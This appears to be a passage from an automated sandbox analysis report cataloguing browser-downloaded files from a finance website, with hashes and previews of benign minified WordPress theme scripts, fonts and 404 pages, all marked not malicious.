                                                                                                                                                                                                                                                                        Preview:var awbMegamenuPosition=function(t){var e,a,r=t.closest("nav"),i=r.hasClass("awb-menu_column")?"column":"row",o=r.attr("data-expand"),u="right"===o?"left":"right",s=t.attr("data-width"),n=jQuery(window).width(),l=t.closest("li"),h=t.outerWidth(),w=n-h,d=!jQuery("#wrapper").css("margin").includes("0px auto"),c={},f={};r.hasClass("awb-menu_flyout")||r.hasClass("collapse-enabled")||(h>=n&&(s="viewport"),e=jQuery("#icon-bar").length?jQuery("#icon-bar").outerWidth():jQuery("#wrapper").outerWidth(d)-jQuery("#wrapper").width(),r.is(":visible")?a=l.offset().left-e:(r.css("display","block"),a=l.offset().left-e,r.css("display","")),"row"===i?"site_width"===s||"viewport"===s?t.css({left:-1*a+w/2,right:"auto"}):("center"===o?(f={right:n-(a+l.outerWidth()/2),left:a+l.outerWidth()/2},jQuery("body").hasClass("ltr")?f.right>h/2?(c.left="auto",c.right="auto"):(c.left=-1*(h-f.right),c.right="auto"):f.left>h/2?(c.left="auto",c.right="auto"):(c.left="auto",c.right=-1*(h-f.left))):(f={right:n-a,left:a+l.ou
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):82562
                                                                                                                                                                                                                                                                        Entropy (8bit):5.385036967667991
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:3ZcKgyELPr7rSrMUGrhrHrARa8G50rU2yvPvUhOj/r8oCheciz7oK:Jn0UP5O2yvPvbjwK
                                                                                                                                                                                                                                                                        MD5:53700E84E0A3ED3F813A8238743F0C39
                                                                                                                                                                                                                                                                        SHA1:3B03A6B647C75A38B6A1F9F941C28E30788760EE
                                                                                                                                                                                                                                                                        SHA-256:5D658FCE19B44713B4FD23E9D5987CF2642359724DACB20CCD110D7F652C5DE5
                                                                                                                                                                                                                                                                        SHA-512:917129414FBB4F720E629310181677D9C742453BA59A6038AE09B210B44713A832131C6737C1793DA6EF7BD9C956E4ACDD12724019C589531A7B5FDB4DB4DBDB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function($,window,undefined){var extensions={flash:["swf"],image:["bmp","gif","jpeg","jpg","png","tiff","tif","jfif","jpe","webp"],iframe:["asp","aspx","cgi","cfm","htm","html","jsp","php","pl","php3","php4","php5","phtml","rb","rhtml","shtml","txt"],video:["avi","mov","mpg","mpeg","movie","mp4","webm","ogv","ogg","3gp","m4v"]},$win=$(window),$doc=$(document),browser,transform,gpuAcceleration,fullScreenApi="",userAgent=navigator.userAgent||navigator.vendor||window.opera,supportTouch="ontouchstart"in window||navigator.msMaxTouchPoints,isMobile=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(userAgent)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (3292), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3292
                                                                                                                                                                                                                                                                        Entropy (8bit):5.087686499184508
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:kMGkITF8Is889eGqEFmGhucmb5VhDgb2iMDQa55mIlAsu9WB9q7KSBu06xjy:8LJBJcmWbLMUC5mau9WBwKSBux1y
                                                                                                                                                                                                                                                                        MD5:18AD71E3158F481D4FF27710E9BC2E00
                                                                                                                                                                                                                                                                        SHA1:16C7037A3316EF9B441A52CA9D2B1CFCB16894EC
                                                                                                                                                                                                                                                                        SHA-256:10FD1FC3FEC66F293E2A2BBD0948449BE50F952D58D1CC92AEDA51214237E87E
                                                                                                                                                                                                                                                                        SHA-512:61B0261FBC3C663402A236B5A512FE23D28DCB3C9B73F540B814A6B528B39D28FE488D7588F3DD19C914D439A9219AE931B1B92B286C91EE2C7021B8FD7D455B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-profile.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".um-profile.um-viewing .um-profile-body .um-row").each(function(){var e=jQuery(this);0==e.find(".um-field").length&&(e.prev(".um-row-heading").remove(),e.remove())}),jQuery(".um-profile.um-viewing .um-profile-body").length&&0==jQuery(".um-profile.um-viewing .um-profile-body").find(".um-field").length&&(jQuery(".um-profile.um-viewing .um-profile-body").find(".um-row-heading,.um-row").remove(),jQuery(".um-profile-note").show()),jQuery(document.body).on("click",".um-profile-save",function(e){return e.preventDefault(),jQuery(this).parents(".um.um-profile.um-editing").find("form").trigger("submit"),!1}),jQuery(document.body).on("click",".um-profile-edit-a",function(e){jQuery(this).addClass("active")}),jQuery(document.body).on("click",".um-cover a.um-cover-add, .um-photo a",function(e){e.preventDefault()}),jQuery(document.body).on("click",".um-photo-modal",function(e){e.preventDefault();e=jQuery(this).attr("data-src");return um_new_modal("um_view_pho
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (4930), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4931
                                                                                                                                                                                                                                                                        Entropy (8bit):5.161158701674536
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:pSXOBDcsDV/2twpvQOHT/6PmG+mYjzjepwe:0kJN2twpvQOzDGbnB
                                                                                                                                                                                                                                                                        MD5:22DC776584FD42EA9406384F6D51E8A0
                                                                                                                                                                                                                                                                        SHA1:0CF7215CF36296015F1846E4E1DBEFE9472B0B6C
                                                                                                                                                                                                                                                                        SHA-256:0B2FC0AA21C08F65573E83C1CC8270ED2B2D39823B97D2C3FA3585DC8B3881C1
                                                                                                                                                                                                                                                                        SHA-512:5500FF96EFD0295486161CCF614AEA77659C539A7B3C9E0A056BDF15A5B4DF938323D24D3231E7EBB7773E9512FA33EFFE9DD6350DF071EF43001812B2A13976
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/script.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";function t(t,e,n){var i=n?";max-age="+24*n*60*60:"";document.cookie=encodeURIComponent(t)+"="+encodeURIComponent(e)+i+";path=/;SameSite=lax"}const e={exists:function(t){return new RegExp(t+"=").test(document.cookie)},create:t,erase:function(e){t(e,"",-1)}};function n(t){return t.innerHTML?t.innerHTML:t.value}function i(t,e){t.innerHTML?t.innerHTML=e:t.value=e}function o(t){this.form=t,this.button=t.querySelector('input[type="submit"],button[type="submit"]'),this.char=".",this.button&&(this.originalButton=this.button.cloneNode(!0)),this.start()}o.prototype.setCharacter=function(t){this.char=t},o.prototype.start=function(){if(this.button){var t=this.button.getAttribute("data-loading-text");if(t)return void i(this.button,t);var e=window.getComputedStyle(this.button);this.button.style.width=e.width,i(this.button,this.char),this.loadingInterval=window.setInterval(this.tick.bind(this),500)}else this.form.style.opacity="0.5"},o.prototype.tick=function(){var t=n(this.button
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12578), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12578
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1861341144390165
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:fNZunVk59S+3h1fUoPE/HPJB3AvRbibTkzBXL+6rNGVilcNSTV3gtt45:fNYnV6PE/hB3Apie+8NPcNSFJ
                                                                                                                                                                                                                                                                        MD5:9DB07B15693407C9279F2682E83F1C1E
                                                                                                                                                                                                                                                                        SHA1:46A5F1FE7850E00770936468C0A0531E1F21582A
                                                                                                                                                                                                                                                                        SHA-256:40262D5DCD887EFA32BE2D9697D54B5B88940928AD0FE7A594075175DF66391D
                                                                                                                                                                                                                                                                        SHA-512:298C6C2817E02322A404572524D2785E96CCC3791FE77E0599B6E7AB8753CBEC626A746B4935884CBFF03F9C06E8200DC073C23E43753ECE41AC1A7CA8877094
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e){"function"==typeof define&&define.amd?define(["./picker","jquery"],e):"object"==typeof exports?module.exports=e(require("./picker.js"),require("jquery")):e(Picker,jQuery)}(function(e,p){var t,y=e._;function a(t,a){function e(){return r.currentStyle?"rtl"==r.currentStyle.direction:"rtl"==getComputedStyle(t.$root[0]).direction}var n,i=this,r=t.$node[0],o=r.value,s=t.$node.data("value"),o=s||o,s=s?a.formatSubmit:a.format;i.settings=a,i.$node=t.$node,i.queue={min:"measure create",max:"measure create",now:"now create",select:"parse create validate",highlight:"parse navigate create validate",view:"parse create validate viewset",disable:"deactivate",enable:"activate"},i.item={},i.item.clear=null,i.item.disable=(a.disable||[]).slice(0),i.item.enable=-(!0===(n=i.item.disable)[0]?n.shift():-1),i.set("min",a.min).set("max",a.max).set("now"),o?i.set("select",o,{format:s,defaultValue:!0}):i.set("select",null).set("highlight",i.item.now),i.key={40:7,38:-7,39:function(){return e()?-1:1},
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):147845
                                                                                                                                                                                                                                                                        Entropy (8bit):5.246024019004457
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:W38ABlxvHTfGD0nEcnR8N4nJSDh3UaGWkHS+NcNCK7jmoYbSEER2GFsa7bdnyJx+:U8VsuNmqyWkH+rEEVsa7Bncx8KWVv
                                                                                                                                                                                                                                                                        MD5:0385B0D9FCCCF648EF94944C020C383C
                                                                                                                                                                                                                                                                        SHA1:153AE0002613FCACF001BBEAD2FCF76B7AFA8990
                                                                                                                                                                                                                                                                        SHA-256:FD6CCC809F3C7E1B4E6FE41162A9B41C7D48BC8A14083213DE9B18EBE5783332
                                                                                                                                                                                                                                                                        SHA-512:9D3CC0C7136E5B16FFDC14D68D4623497280C501815FBD3DCAA500751A8DAF61796D1BF56267645BA40471F14A39F4FCAB8E54657AC091A669D5FD454CDFC3A1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/swiper.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var Swiper=function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(s,a){void 0===s&&(s={}),void 0===a&&(a={}),Object.keys(a).forEach(i=>{void 0===s[i]?s[i]=a[i]:e(a[i])&&e(s[i])&&Object.keys(a[i]).length>0&&t(s[i],a[i])})}const s={body:{},addEventListener(){},removeEventListener(){},activeElement:{blur(){},nodeName:""},querySelector:()=>null,querySelectorAll:()=>[],getElementById:()=>null,createEvent:()=>({initEvent(){}}),createElement:()=>({children:[],childNodes:[],style:{},setAttribute(){},getElementsByTagName:()=>[]}),createElementNS:()=>({}),importNode:()=>null,location:{hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""}};function a(){const e="undefined"!=typeof document?document:{};return t(e,s),e}const i={document:s,navigator:{userAgent:""},location:{hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""},history:{replaceState(){},pushState(){},go(){},ba
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3716), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3716
                                                                                                                                                                                                                                                                        Entropy (8bit):5.308935060642068
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:XveMh9/3I8z2iIHugsYfCpstBR3iuRVxNP://n20Y6ytBR3iuR
                                                                                                                                                                                                                                                                        MD5:D8AC279425BBE852C2CAEDEFF76BB19F
                                                                                                                                                                                                                                                                        SHA1:B00E06765B008E87389E9B692FE0DD09949A05E9
                                                                                                                                                                                                                                                                        SHA-256:2366B982A14BF1A6175490D4C10CB24E200F6838E4AD5DC233D7AE5C12913365
                                                                                                                                                                                                                                                                        SHA-512:7FCE1D93B4CAB176BF0AFD59D1DA980D53F1629BAA748686AA3DEE63C22C88031E134B7D64B929696813ABA14D4BFB65D92912A8DDD8B226C17C240CA516F1DB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";t.fn.awbAnimateTitleHighlightsAndRotations=function(){"IntersectionObserver"in window?t.each(fusion.getObserverSegmentation(t(this)),function(i){var n=fusion.getAnimationIntersectionData(i),e=new IntersectionObserver(function(i,n){t.each(i,function(i,a){var o=t(a.target);fusion.shouldObserverEntryAnimate(a,n)&&(t(o).hasClass("fusion-title-rotating")&&t(o).animateTitleRotations(),t(o).hasClass("fusion-title-highlight")&&t(o).animateTitleHighlights(),e.unobserve(a.target))})},n);t(this).each(function(){e.observe(this)})}):t(this).each(function(){var i=t(this);t(i).hasClass("fusion-title-rotating")&&t(i).animateTitleRotations(),t(i).hasClass("fusion-title-highlight")&&t(i).animateTitleHighlights()})},t.fn.animateTitleRotations=function(){var i=t(this),n=i.find(".fusion-animated-texts-wrapper"),e=i.hasClass("fusion-loop-on"),a=t(i).closest("[data-animationduration]").data("animationduration"),o=void 0!==a?200*parseFloat(a):0;n.removeData("textillate"),t(i).find(".
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1393), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1393
                                                                                                                                                                                                                                                                        Entropy (8bit):4.986309365138596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:zAMkzP11a0j1h37mEv0GXzP60ZR445OYq52so15RgvPXs1UkBRR4yXygBUehXLDr:kMaL37WwRJ4oso15WmRjC0h7DjZ6+
                                                                                                                                                                                                                                                                        MD5:089072481DD4B295480BAE64DE87A980
                                                                                                                                                                                                                                                                        SHA1:87F9B6C35D2FF97FB85C7E0FA22F63AE772484FD
                                                                                                                                                                                                                                                                        SHA-256:F9DD43A5DEEF56F854B83808ECE64062B5E8A97EDB2092949441D5930858C2A6
                                                                                                                                                                                                                                                                        SHA-512:7BA03031AFEC13CBAC8EFC634D81F99D0BACD1F78CE9CF6F5644A3CBF04E956AE84A558116E93F56BFF6055CF5D2D9AA24E6C72E2BB7570EFCECDA137ABF3BF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".fusion-vertical-menu-widget .current_page_item, .fusion-vertical-menu-widget .current-menu-item").each(function(){var e=jQuery(this),n=e.parent();e.find(".children, .sub-menu").length&&e.find(".children, .sub-menu").show("slow"),e.parentsUntil(".fusion-vertical-menu-widget",".children, .sub-menu").show("slow"),n.hasClass("fusion-vertical-menu-widget")&&e.find("ul").show("slow")})}),jQuery(window).on("load",function(){jQuery(".fusion-vertical-menu-widget.click li a .arrow").on("click",function(e){var n=jQuery(this).parent(),i=n.parent(),t=i.find("> .children, > .sub-menu");if(e.preventDefault(),(i.hasClass("page_item_has_children")||i.hasClass("menu-item-has-children"))&&(t.length&&!t.is(":visible")?t.stop(!0,!0).slideDown("slow"):t.stop(!0,!0).slideUp("slow")),n.parent(".page_item_has_children.current_page_item, .menu-item-has-children.current-menu-item").length)return!1}),jQuery(".fusion-vertical-menu-widget.hover li").each(function(){var e;j
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2670), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2670
                                                                                                                                                                                                                                                                        Entropy (8bit):5.062559850999237
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:tAMJod1RDEfrM/+NE3dqiEN9uGXrUiXP6yP662fSpDEfX:+JiJ/6M6KpY
                                                                                                                                                                                                                                                                        MD5:383E2B4FBE45D38F45CE86BC1320B810
                                                                                                                                                                                                                                                                        SHA1:64ACC1A99BE659AB310A4371FF858DAD31F0BEC1
                                                                                                                                                                                                                                                                        SHA-256:C115876F20F61789F14DB9FF0BAB7A7130E64BDC8CBE27E50BFF42152C9374FA
                                                                                                                                                                                                                                                                        SHA-512:BE92D689917379BBDB70AEDAE32190BFD3FB6DEEE0E23C219B6D931F091A76666BE5D3249727509C1E909014CB6DA1E2C318CA97101756F38B81C8469FA18F78
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){var i,n={message:"",yes_label:"Yes",no_label:"No"},m={init:function(o){i=t.extend({},n,o),t(this).each(function(){t(this).data("options",i),m.build.apply(t(this),[i]),t(this).click(function(o){var i=t(this).data("options");t("#um_confirm_message").html(i.message),t("#um_confirm_button_yes").html(i.yes_label),t("#um_confirm_button_no").html(i.no_label),m.show.apply(this),o.stopPropagation()})})},build:function(o){m.is_builded.apply(this)||(t('<div id="um_confirm_block"></div>').appendTo("body").html('<div class="um_confirm"><div id="um_confirm_title">Confirmation</div><div id="um_confirm_message"></div><div id="um_confirm_buttons"><div id="um_confirm_button_yes" class="um_confirm_button">Yes</div><div id="um_confirm_button_no" class="um_confirm_button">No</div></div></div><div id="um_confirm_block_back"></div>'),t(document).on("click","#um_confirm_button_yes",function(){var o=t("#um_confirm_block").data("obj");m.yes.apply(o)}),t(document).on("click","#um_confirm_button_no",
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14535), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):14535
                                                                                                                                                                                                                                                                        Entropy (8bit):5.042493840691545
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:UUQwQ9iEBOMDDpiu6BRLr9Bt7Bmc17uJmiJzq8hczAbG6lS:pQ8EFFiZBp9Btpeu8hcUho
                                                                                                                                                                                                                                                                        MD5:66322043C8339B539278E4E7495DE00C
                                                                                                                                                                                                                                                                        SHA1:B263A1B8EB5E1A1611A6E5B9F90B45FFB30DC54F
                                                                                                                                                                                                                                                                        SHA-256:8BDDDB85C67DE06D386303C707FA868B1F5409B4CB8667F49F0EBC11AF63B3DF
                                                                                                                                                                                                                                                                        SHA-512:F1D41164531CBC8746C7A228243DDB527B65C9B7F940872E316409C07D1D49EEC72DC8C9F6F86BE422374DBDB1074DFD940FDD7BA5D271B12DC5F13F4C50954B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-menu.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var fusionNavClickExpandBtn=function(e){var n="object"==typeof e&&"object"==typeof e.currentTarget?jQuery(e.currentTarget):jQuery(e),a=n.parent();a.toggleClass("expanded"),a.attr("aria-expanded","false"===a.attr("aria-expanded")?"true":"false"),n.attr("aria-expanded","false"===n.attr("aria-expanded")?"true":"false"),a.hasClass("expanded")?a.find("ul > li").find("> a, > button").removeAttr("tabindex"):a.find("ul > li").find("> a, > button").attr("tabindex","-1"),fusionNavMobilePosition(a[0])},fusionNavClickExpandSubmenuBtn=function(e){var n="object"==typeof e&&"object"==typeof e.target?jQuery(e.target):jQuery(e),a=n.closest("nav"),u=n.parent();if(a.hasClass("awb-menu_v-stacked")&&!a.hasClass("collapse-enabled")||a.hasClass("awb-submenu_v-stacked")&&!a.hasClass("collapse-enabled"))return fusionVerticalSubmenuDirection(u,n),void fusionNavClickExpandBtn(n);"object"==typeof e.target&&e.preventDefault(),a.hasClass("collapse-enabled")?(a.hasClass("awb-menu_mobile-accordion")&&u.siblings(".exp
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 78212, version 331.-31261
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):78212
                                                                                                                                                                                                                                                                        Entropy (8bit):7.99720885040274
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:1536:MGgygaAeCFuk9I0yvQkAcaCfK+DBfT5UftBd5OCNY21r/CrDhy4DDh+xu:XglnpFz9KQkAhCfBxT5Uf7d59xiDEs
                                                                                                                                                                                                                                                                        MD5:8C4F474A3AAA695346196B1F33FAB616
                                                                                                                                                                                                                                                                        SHA1:ABC1AE262D760E104A5A5CB68614AC119FD0DB18
                                                                                                                                                                                                                                                                        SHA-256:EF2369C82B6EC19BCF4FE76799D94EDC43604E164C0F73978059536159845441
                                                                                                                                                                                                                                                                        SHA-512:8CEBDE83C69BF5CC28F64263EFCE6AC0179EB74E716461A2BD9F8A1AA24E9A1EC971F7D5487E9D4ADCC4A970F241CA3D5F356A19ABD57DDA8DBCB5F1EB64AB09
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2
                                                                                                                                                                                                                                                                        Preview:wOF2......1...........1+.K......................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u..p....fU.Y .^...;...p.g.W...m........*......%....I;....XP.TD.==...,..."S.. J4.IN.M.M..r.w.,{\{..Uk.5...0E@E@E@y<..$Y..uLEJq.-p...........j)...f..h4dDgF.hbF.../.M].....2..<...u.wW.........U_5..S.n..c...e....Q...J*.R'=Y..R.Wg.7.@.jVl.[ee!.(.f......M......&t.l..."i.)..|n....w...5...H...{rw.x....d..=K...............=..:..).!.t.C......n`.p5.X..,...H]*..!.~.~l..~.@.S_a.....~._.M.x$D<i?.I...:/tL.......?.....%..P(k}......Q..<.IvH.K.....H|22.d.>.D......s.7..D.mx..Dr.Z)."..".-3.........3.@$.....Ceo.DQ.(.N.L7..+...Y...`KliY.-..v..J..kl.....Y....m.oU...Cf0...X..V...|..:.....<+....Y......=.....D..8g......L..~.....\......Mm!.....4...P..mT.=.l...#.5._)Z......A.....b...|...F..x..&.;.^^.U.U.E....!..3.:P.@7+......7<....\..9.F......9H......X..B..DA..&N...;..G...F?X.~;..5PZg.........).....4..dh.......C...i.....y..X[{...HV.`V.B.JxQ....3...........B.......g?.....)a..C.B.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (885), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):885
                                                                                                                                                                                                                                                                        Entropy (8bit):4.909217118842004
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:KnPy7J31HQ59Eo5WvGQbdQblYQbzIRYQbWcYQb/wMXUvEJe:KnP2W609IGmxQn
                                                                                                                                                                                                                                                                        MD5:9976A7E9855529DF374B54BA15C8B57D
                                                                                                                                                                                                                                                                        SHA1:D8FF4D5BF04E48A00BACAB2BBE1613E495139EC0
                                                                                                                                                                                                                                                                        SHA-256:FA230B2E4F8304E9BED43CD46B687D50E17D777B2A94407C2055B76EDEE06757
                                                                                                                                                                                                                                                                        SHA-512:570F98FFA8573C7FC401F82744BE2DC683426F97D2DA1B1D2E4DD3862B6E428B884A592DE0B56CFA53FB14469D82E8E578FCFB0F139B5439A808501C8C7A152D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function calcSelectArrowDimensions(e){var n=".avada-select-parent .select-arrow, .gravity-select-parent .select-arrow, .wpcf7-select-parent .select-arrow";(void 0!==e?jQuery(e).find(n):jQuery(n)).filter(":visible").each(function(){0<jQuery(this).prev().innerHeight()&&jQuery(this).css({height:jQuery(this).prev().innerHeight(),width:jQuery(this).prev().innerHeight(),"line-height":jQuery(this).prev().innerHeight()+"px"})})}jQuery(window).on("load fusion-element-render-fusion_tb_woo_cart fusion-element-render-fusion_tb_woo_checkout_tabs fusion-element-render-fusion_tb_woo_checkout_billing fusion-element-render-fusion_tb_woo_checkout_shipping fusion-element-render-fusion_woo_cart_shipping",function(){calcSelectArrowDimensions(),setTimeout(function(){calcSelectArrowDimensions()},100)}),jQuery(window).on("fusion-dynamic-content-render",function(e,n){calcSelectArrowDimensions(n)})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1766), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1766
